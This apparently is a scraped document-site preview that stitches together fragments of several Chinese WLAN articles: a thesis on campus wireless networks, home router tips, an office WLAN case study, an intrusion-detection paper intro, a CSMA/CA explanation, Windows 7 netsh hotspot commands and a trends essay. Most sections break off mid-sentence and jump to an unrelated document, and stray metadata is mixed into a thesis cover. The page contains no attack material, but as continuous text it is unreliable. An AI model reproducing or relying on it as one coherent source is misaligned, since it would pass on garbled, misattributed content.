它主要应用在笔记本电脑中,实现随时随地的移动上网。从接口上分为USB接口和PCMIA接口两类;而从申请的移动上网服务方面分为GPRS卡和CDMA卡,如下图所示为CDMA无线上网卡。 无线局域网的应用与发 展 Company Document number:WUUT-WUUY-WBBGB-BWYTT-1982GT 北京大学毕业设计论文无线局域网的应用与发展 (以为讨论重点) The Development and Application of Wireless LAN (Focus in 班级:G0122193 学号: 导师:吴增德 姓名:白方 北京大学计算机科学与技术网络学院 2010年4月 摘要 本次本科毕业设计的要求是为跟踪目前无线上网技术并探讨以后无线数据传输的发展方向,相信随着科技的不断进步,数据传输无线技术的应用会为个人带来更为方便的处理信息的方式.无线上网是无线数据传输目前应用最为广泛且最基本的一种模式.其中又以WLAN(无线局域网)的技术为主,另外还有通过GPRS或者CDMA1X等各种不同的无线接入模式. 在具体设计中,会为分为几大部分.1,概述.无线宽带接入技术国内外目前状况2,无线宽带技术与设备总述.3,无线宽带技术解决方案.4,WLAN网络管理与认证计费系 统.5,WLAN的应用方案分析。6,总结与展望 7,参考资料.. Abstract The main issue for this article is discussing the future expending of wirless data internet working. By the improvement of technology, the application of wireless data transmission will bring more convience of data transaction. Wireless data internet working application currently is the basic and the wildest used concept, and especially in WLAN technology, GPRS or CDMAIX wireless mode. There are several topics in the following article: 1.The development actuality and trend of wireless broadband communications 2.The tech and equipment of wireless broadband communications 3.Wireless broadband communications solution 4.WLAN management and billing 5.Analysis of WLAN application 6.Conclusion 7.Reference 目录 校园无线网设计原则 (3) 校园各子网设计 (3) 宿舍无线组网方案分析 (4) 校园网无线网络覆盖解决方案 (5) WLAN特有的内容 (5) 纯AP多蜂窝覆盖 (6) 从室外向室内覆盖 (7) WLAN+GSM的合路覆盖 (7) 单纯WLAN的天馈覆盖 (8) 无线网用户管理 (8) 提高管理和应用水平 (9) 方案完备应用为先 (9) 1、大型建筑无线网络解决方案 (10) 应用于校园网需注意的几个问题 (12) 1.网络覆盖的问题 (12) 2.每个AP接入点的发射功率 (13) 3.访问AP的权限 (13) 4.对校园网WLAN的管理 (13) 5.无线局域网应用校园网暂时的弊端 (13) (1)标准的不统一 (13) (2)网络安全问题 (14) (3)性价比暂时不高 (14) 无线网络基础架构 (14) 具体建设方案 (15) 1. 室内 (15) 2 . 室外 (15) 当前无线校园网解决的问题 (16) 1.解决信息点流动的问题 (16) 2.解决难以布线的问题 (17) 3. 提高教学效率 (17) 4. 节约成本 (17) 校园无线网络 随着宽带网络的迅猛发展,高校网络建设的逐步普及,越来越多的师生已经离不开网络,在实验室可以调阅数据库、图书馆里可以查阅全部分类藏书、回宿舍可以登录校园网站等等;越来越多的上网需求也带来了上网方式的逐步丰富——作为有线网络的有益补充和技术发展,无线在校园里的应用已经越来越普遍。 校园无线网设计原则 校园无线网的设计原则建立在充分考虑学校使用需要的基础上,力求满足整个校园网的可靠性、先进性、实用性、可兼容及可扩展性。 (1)可靠性:确保系统可靠运行,关键设备应有冗余; (2)先进性:采用当今国内、国际上最先进和成熟的计算机软、硬件技术,使新建立的系统能够最大限度地适应今后技术和业务发展的需要; (3)实用性:能够最大限度地满足实际工作的需求,是每个信息系统在建设过程中所必须考虑的一种系统性能,他是自动化系统对用户最基本的承诺; (4)可兼容及可扩展性:在进行方案建设时,力求做到网络结构清晰、合理并具有扩展能力;硬件设置先进、可靠,能够满足网络及软件运行的需要;系统软件安全、可靠,界面友好,易于操作和维护。 校园各子网设计 (1)教学子网:校园网建网的目的之一是利用计算机网络实现多媒体教学。在教学过程中,大量传送的是文本、图像和部分视频等数据,对速度需求较高,所以设计时推荐所有教学用有线接入百兆无线设备覆盖; (2)办公子网:办公子网主要面向学校的各级领导及各职能部门,办公计算机所实现的功能主要是对网络数据的查询、修改、添加、删除等操作。这样对无线的需求不是非常高,一般的无线设备都能够使用。 (3)图书馆子网:图书馆从应用来说是个相对独立的系统,因此设计时在图书馆设图书 无线局域网网络搭建构架的六大要素 无线网络以其“无所不在”的魅力正成为人们追逐的焦点。无论是网络升级还是重新组网,人们总希望自己的网络能够摆脱线缆的束缚,走进自由的天地。但与有线产品相比,无线产品还是新事物,并不是所有的用户都能很好地把握组建要点。本文将对六个带有普遍性的疑问进行解答,希望对大家组建WLAN有所帮助。 是802.11g还是802.11b? 就目前而言,人们实现无线上网有三种途径,分别是WLAN无线上网和CDMA、 GPRS上网。对家庭用户来讲,不论是速度还是资费,WLAN无线上网都是体验无线自由的绝佳方案。如今市面上能够组建WLAN网络的产品按照速率的不同,可以分为11M、54M、22M、108M 等,其中以前两者产品最为多见。那么对于家庭用户,这两种标准的产品哪一个更适合呢? 要回答这个问题并不是很容易,因为虽然802.11g产品可以看成是 802.11b产品的升级,但在兼容性、稳定性以及覆盖面、价格上的优势并不明显。首先,802.11b产品11M的传输速度高于DSL、LAN等家庭常见宽带类型的接入速度,完全可以满足家庭用户无线宽带共享上网的需求。其次,802.11b产品在价格上容易接受,从目前的价格来看,同品牌的802.11g产品往往是802.11b产品价格的2~3倍,但近期也有少数厂商刚刚将价格降低到用户可以接受的水平。还有经过市场考验的802.11b 产品较多,选择余地大,所以更适合家庭用户选用。 802.11g是未来发展的主流,不过这里需要提醒大家的是,802.11g产品与802.11b产品混用时,吞吐量只能达到14.4M左右,所以802.11g产品比较适合新网络的组建。 需要另行购置无线防火墙吗? 网络安全是个永恒的话题,只是在无线网络中显得尤为沉重。至于802.11x有什么样的安全漏洞这里不再赘述。我们想解答的问题是:组建无线网络需要另行购置无线防火墙吗? 在无线领域里,专心致力于防火墙功能的产品并不多,即使有,在价格上家庭用户也无法承受。换句话说,无线防火墙总是和其他产品捆绑在一起,作为其他产品的一种附加功能出现,其中最为多见的就是无线宽带路由器。 无线宽带路由器是比无线AP性价比更高的产品,是目前实现家庭网络共享的上佳产品。家用产品价格维持在500~1000元之间,在暑期促销期间,它们的价格都有大幅度下降。这些产品一般都会集成AP、路由及交换机功能,有的产品还采用了先进的Stateful Packet Inspection防火墙技术,可以防护DoS攻击,还可以对可能出现问题的E-mail发出警告通知。此外,很多产品还拥有多种安全措施,比如128 位WEP加密、SSID隐藏、MAC地址过滤等。其中MAC地址过滤是目前常用的小规模网络的高效率安全解决方案,它通过检查用户数据包的源MAC地址来认证用户的可信度。而对于高级用户,也可通过VPN功能建立自己专用的安全通道。 无线局域网应用实例 摘要:通常计算机组网的传输媒介主要依赖铜缆或光缆,构成有线局域网。但有线网络在某些场合要受到布线的限制:布线、改线工程量大;线路容易损坏;网中的各节点不可移动。特别是当要把相离较远的节点连接起来时,敷设专用通信线路的布线施工难度大、费用高、耗时长,对正在迅速扩大的联网需求形成了严重的瓶颈阻塞。无线局域网就是解决有线网络以上问题而出现的,在不采用传统缆线的同时,提供以太网或者令牌网络的功能。 Notes:Wire local area network usually depend on copper or fiber optic cable, But limited for wiring in some places, wiring, re-routing large projects; line easily damaged; node of the network can not move. Especially when it is farther from the node, laying special communication circuit wiring of big construction difficulty, high cost, long time, the rapidly expanding demand for networking a serious bottleneck obstruction. Wireless local area network cable network is to address the above problems, not in the traditional cable at the same time, provide Ethernet or token network function. 关键字:无线局域网;组建; 资源共享;应用实例。 引言:本单位原办公室拆迁重建,租用临时办公室,租用办公室一楼为通敞结构,各科室部门集中在一楼办公,领导办公分布在二楼独立房间。本单位现有办公电脑台式机15台、笔记本3台、多功能打印机2台,操作系统为winXp 和win7。Internet 接入方式为光纤静态IP,带宽:10M/bps。由于办公室为租用,布线较为不便,综合各方因素考虑,决定采用无线局域网,实现共享上网、文件及打印机共享等主要功能。 1.实现过程 在实现无线局域网前,我们新购进TP-LINK 300M bps无线路由器作为进行数据发送和接收的设备,称为接入点AP(Access Point)、15个TP-LINK 11N 300Mbps无线USB网卡,因笔记本自带配有WiFi功能,故不必另外配置。 1.1 AP的硬件连接。连接方法:通过五类网线将光纤收发器连接到无线路由器的Wlan口, 无线局域网研究论文 随着无线技术和网络技术的发展,无线网络正成为市场热点,其中无线局域网(wLAN)正广泛应用于大学校园、各类展览会、公司内部乃至家用网络等场合。但是,由于无线网络的特殊性,攻击者无须物理连线就可以对其进行攻击,使wLAN的安全问题显得尤为突出。对于大部分公司来说,wLAN通常置于防火墙后,黑客一旦攻破防火墙就能以此为跳板,攻击其他内部网络,使防火墙形同虚设。与此同时,由于wLAN国家标准wAPI的无限期推迟,IEEE802.11网络仍将为市场的主角,但因其安全认证机制存在极大安全隐患,无疑让wLAN的安全状况雪上加霜。因此,采用入侵检测系统(IDS——intrusiondetectionsystem)来加强wLAN的安全性将是一种很好的选择。尽管入侵检测技术在有线网络中已得到认可,但由于无线网络的特殊性,将其应用于wLAN尚需进一步研究,本文通过分析wLAN的特点,提出可以分别用于有接入点模式wLAN和移动自组网模式wLAN的两种入侵检测模型架构。 上面简单描述了wLAN的技术发展及安全现状。本文主要介绍入侵检测技术及其应用于wLAN时的特殊要点,给出两种应用于不同架构wLAN的入侵检测模型及其实用价值。需要说明的是,本文研究的入侵检测主要针对采用射频传输的IEEE802.11a/b/gwLAN,对其他类型的wLAN同样具有参考 意义。 1、wLAN概述 1.1wLAN的分类及其国内外发展现状 对于wLAN,可以用不同的标准进行分类。根据采用的传播媒质,可分为光wLAN和射频wLAN。光wLAN采用红外线传输,不受其他通信信号的干扰,不会被穿透墙壁偷听,而早发射器的功耗非常低;但其覆盖范围小,漫射方式覆盖16m,仅适用于室内环境,最大传输速率只有4mbit/s,通常不能令用户满意。由于光wLAN传送距离和传送速率方面的局限,现在几乎所有的wLAN都采用另一种传输信号——射频载波。射频载波使用无线电波进行数据传输,IEEE802.11采用2.4GHz频段发送数据,通常以两种方式进行信号扩展,一种是跳频扩频(FHSS)方式,另一种是直接序列扩频(DSSS)方式。最高带宽前者为3mbit/s,后者为11mbit/s,几乎所有的wLAN厂商都采用DSSS作为网络的传输技术。根据wLAN 的布局设计,通常分为基础结构模式wLAN和移动自组网模式wLAN两种。前者亦称合接入点(AP)模式,后者可称无接入点模式。分别如图1和图2所示。 图1基础结构模式wLAN 图2移动自组网模式wLAN .2wLAN中的安全问题wLAN的流行主要是由于它为使用者带来方便,然而正是这种便利性引出了有线网络中不存在 CSMA/CA的MAC(多址接入)部分又可以分为两类:基本方案和RTS/CTS (Request To Send/Clear To Send)方案。下面讨论RTS/CTS方案。 当采用RTS/CTS方案时,如果一个节点有数据需要发射,首先检测信道是否空闲: (1)如果信道空闲且空闲持续时间的长度达到DIFS(分布式的帧间间隔),节点则首先发射一个RTS分组来预约信道,然后目标接收节点应答一个CTS组。 (2)如果信道非空闲,或空闲持续时间小于DIFS,则节点进入冲突避免(CA)状态。当节点接收到CTS 分组后,开始发射DATA分组,最后目标接收节点再应答一个ACK分组。由于RTS分组(长度为44字节)之间的冲突对网络性能造成的损害要远远小于DATA分组(长度为2346字节)之间的冲突所造成的损害,因此,采用RTS/CTS方案可以提高网络的性能。但是,当DA TA分组的长度较小时,就需要考虑发射RTS /CTS所造成的开销。 CSMA/CA的CS(载波检测)部分包括物理层的载波检测和MAC层的虚拟载波检测。前者主要是检测其他节点造成的信道物理状态的变化。后者则通过使每个节点都各自维持一个NA V(网络分配矢量)参数来实现。当一个节点(如A)收到其他节点发射的RTS、CTS和DATA分组时,从这些分组的头部提取出该数据交换序列剩余的持续时间来更新A自己的NA V。根据NA V的值,A的MAC层就能够知道当前的数据传送活动将在什么时候结束。因此,采用虚拟载波检测的主要目的是为了在多跳Ad hoc网络中防止出现隐终端问题。此外,在许多节省能量消耗的方案中,虚拟载波检测机制对于确定节点应该何时从“睡眠"状态“醒来"而进入到“活跃”状态也是非常重要的。 CSMA/CA中的CA(冲突避免)部分比较简单:当节点接收到新的数据发送任务时,首先检查载波检测的结果,如果信道空闲且持续时间超过DIFS时间,则立即发送该分组;如果信道非空闲或空闲持续时间小于DIFS时间,则随机选择一个退避时间之后执行随机退避;在退避的过程中如果信道非空闲则暂停随机退避过程,而当信道转为空闲且持续时间超过DIFS时间之后再恢复随机退避过程,并在随机退避计数器的数值递减为O时立即发送RTS分组。当RTS-CTS握手失败或DA TA-ACK握手失败时,发射节点则认为发生了分组接收冲突事件,进而执行冲突解决:增大随机退避窗口的数值,随机选择退避时间并执行随机退避过程。如果RTS-CTS连续握手失败的次数达到一定的数值,则认为目标节点已不可达,此时发射节点丢弃分组并向路由层报告链路失效。 WIN7笔记本利用cmd建立无线局域网共享的方法 1、以管理员身份运行命令提示符: 快捷键win+R→输入cmd→回车 2、启用并设定虚拟WiFi网卡: 运行命令:netsh wlan set hostednetwork mode=allow ssid=Mirly key=mirly132 此命令有三个参数,mode:是否启用虚拟WiFi网卡,改为disallow则为禁用。 ssid:无线网名称,最好用英文(以wuminPC为例)。 key:无线网密码,八个以上字符(以wuminWiFi为例)。 以上三个参数可以单独使用,例如只使用mode=disallow可以直接禁用虚拟Wifi网卡。 开启成功后,网络连接中会多出一个网卡为“Microsoft Virtual WiFi Miniport Adapter”的无线连接2,为方便起见,将其重命名为虚拟WiFi。若没有,只需更新无线网卡驱动就OK了。 3、设置Internet连接共享: 在“网络连接”窗口中,右键单击已连接到Internet的网络连接,选择“属性”→“共享”,勾上“允许其他······连接(N)”并选择“虚拟WiFi”。 确定之后,提供共享的网卡图标旁会出现“共享的”字样,表示“宽带连接”已共享至“虚拟WiFi”。 4、开启无线网络: 继续在命令提示符中运行:netsh wlan start hostednetwork (将start改为stop即可关闭该无线网,以后开机后要启用该无线网只需再次运行此命令即可) 至此,虚拟WiFi的红叉叉消失,WiFi基站已组建好,主机设置完毕。笔记本、带WiFi模块的手机等子机搜索到无线网络wuminPC,输入密码wuminWiFi,就能共享上网啦! 附:显示无线网络信息命令:netsh wlan show hostednetwork 虚拟无线AP发射的WLAN是802.11g标准,带宽为54Mbps。 无线局域网应用及未来发展趋势 摘要:介绍了wlan 技术的发展历史,分析了wlan 技术的特点和目前的标准化进展现状和组网方式,阐述了该技术的应用和未来发展趋势,指出wlan 具有广阔的应用和市场发展前景。 关键词:无线局域网正交频分复用技术多入多出技术 1、前言 wlan(wireless local area network,无线局域网),是指应用无线通信技术将计算机设备互联起来,构成可以互相通信和实现资源共享的网络体系,从而使网络的构建和终端的移动更加灵活。wlan技术的成长始于20世纪80年代中期,它是由美国联邦通信委员会(fcc)为工业、科研和医学(ism)频段的公共应用提供授权而产生的。这项政策使各大公司和终端用户不需要获得fcc许可证,就可以应用无线产品,从而促进了wlan技术的发展和应用。 2、wlan技术简介 wlan以射频(radio frequency;rf)技术代替传统的双绞铜线,利用无线多址信道作为传输媒介,使用电磁频谱来传递信息。为通信的移动化、个性化和多媒体应用提供了可能。射频技术(射频识别)的原理是接收器接收扫描器发射的无线电波能量电路将内部的代码送出,同时扫描器便接收此代码。 自1990年ieee正式启用802.11项目以来,无线网络技术逐渐走向成熟。wlan(无线局域网)基于ieee 802.11标准,允许在局 域网环境中使用未授权的2.4ghz或5ghz等射频波段进行无线连接。可以广泛部署和应用于企业,进行企业网络连接乃至internet 热点接入。而传输速度的不断提升,始终贯穿于wlan发展的主线中。wlan 的 ieee 802.11a 标准使用 5ghz 频段,支持的最大速度为 54 mb/s,而ieee 802.11b 和 ieee 802.11g 标准使用 2.4 ghz 频段,分别支持最大 11mb/s和 54 mb/s 的速度。从2m、11m、54m、每一次速度的提升,都是一次跨越式的变革,而802.11n的300m乃至现在的450m,使所有关注wlan的人都不禁要问,wlan究竟还能有多快。 3、wlan未来趋势分析 3.1 ofdm(正交频分复用)技术 ofdm(正交频分复用)技术具有更高的频谱利用率,抗多径干扰能力也大大增强。它既增加了系统容量,又满足了多媒体通信要求。ofdm技术本质上属于mcm(multi一carriermodulation,多载波调制)的一种。首先将信道分成若干正交子信道,然后将高速数据信号转换成并行的低速子数据流,并调制到正交子信道上同时传输。在接收端将正交信号分开,可以减少子信道之间的相互干扰。每个子信道上的信号带宽小于信道的相关带宽,消除了符号间的干扰。信道均衡也因子信道的带宽的减小变得相对容易了。 ofdm可以在子载波间进行编码,形成编码的ofdmcofdm即把ofdm 技术与信道编码、频率时间交织结合起来,提高系统的性能,其编 摘要 在无线局域网WLAN发明之前,人们要想通过网络进行联络和通信,必须先用物理线缆-铜绞线组建一个电子运行的通路,为了提高效率和速度,后来又发明了光纤。当网络发展到一定规模后,人们又发现,这种有线网络无论组建、拆装还是在原有基础上进行重新布局和改建,都非常困难,且成本和代价也非常高,于是WLAN的组网方式应运而生无线局域网(WLAN)产业是当前整个数据通信领域发展最快的产业之一。因其具有灵活性、可移动性及较低的投资成本等优势,无线局域网解决方案作为传统有线局域网络的补充和扩展,获得了家庭网络用户、中小型办公室用户、广大企业用户及电信运营商的青睐,得到了快速的应用。 然而在整个无线局域网中,却有着种种问题困扰着广大个人用户和企业用户。首先是该如何去组建无线局域网,这也是无线局域网中最基本的问题之一。 具体来分,组建无线局域网包括组建家庭无线局域网和组建企业无线局域网。下面让我们来看看家庭无线局域网的组建设计。 关键词:无线局域网,家庭无线组网方式,家庭无线局域的搭建共享文件 目录 摘要 (1) 家庭无线局域网组建 (1) 1无线局域网的组成 (2) 1.1无线网卡 (5) 1.2无线AP (6) 1.3无线路由器 (6) 1.4无线天线 (7) 1.5其它无线设置 (7) 2 家庭无线局域网的接入方式 (8) 2.1 独立无线网络 (8) 2.2接入以太网的无线网络 (8) 3 家庭无线局域的搭建 (9) 3.1无线设备的选购 (9) 3.2无线网卡的安装 (9) 3.3无线路由的安装 (10) 3.4计算机接入无线网络 (13) 4 家庭局域网文件共享 (14) 4.1创建家庭组 (14) 4.2加入“家庭组” (14) 4.3家庭无线局域网自定义共享文件资源 (16) 4.4退出家庭组 (17)WLAN协议
规划设计一个中小规模企业无线局域网
局域网的构建与配置
无线局域网的应用与发展
无线局域网安全隐患与防范措施
WLAN标准协议
构建无线局域网的主要设备
无线局域网的应用与发展
无线局域网络设计
无线局域网网络搭建构架的六大要素
无线局域网应用实例
无线局域网研究论文
WLanDCF-MAC协议
WIN7笔记本利用cmd建立无线局域网共享的方法
无线局域网应用及未来发展趋势
家庭无线局域网的组网方案设计
相关主题
文本预览